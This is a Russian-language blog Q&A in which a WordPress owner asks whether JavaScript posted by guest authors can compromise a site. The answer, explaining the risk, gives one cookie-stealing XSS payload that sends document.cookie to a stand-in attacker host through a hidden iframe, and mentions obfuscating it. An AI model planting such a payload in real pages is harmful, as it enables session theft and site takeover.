Вопрос такого рода: могут ли взломать сайт с помощью внедрения JS кода? Да-да, многие говорят что фантазия безгранична, и что взломать вроде можно, но я пока не вижу способов, да я и в JS не большой спец. Хотелось бы увидеть конкретный пример взлома сайта (получения доступа к ftp, к файлам, возможность удалять/создавать файлы, менять права и тп.) Для внутренних органов: интересуюсь чисто в целях самозащиты =) Хочу давать право на написание статей на блоге незнакомым авторам, вот и интересно - WP пропускает JS прекрасно, делать с этим что-то, или оставить так.
Ответ
Банальный пример: var i = document.createElement('iframe'); i.style='width: 1px; height: 1px; visibility: hidden;'; document.getElementsByTagName('body')[0].appendChild(i); i.src='http://vasya-pupkin-xakep.org/stealcookie.php?c='+document.cookie; Таким образом хакер Вася Пупкин часто тырит админские куки и очень быстро заходит с ними на сайт. Если у админа есть возможность редактировать файлы из админки - это полный контроль (есть такие штуки как phpftp и phpmyadmin) Также этот код можно за- и перешифровать три раза, чтобы это был нечитаемый набор символов. Вместо куков можно просто таким образом накручивать посещения другому сайту etc.
Комментариев нет:
Отправить комментарий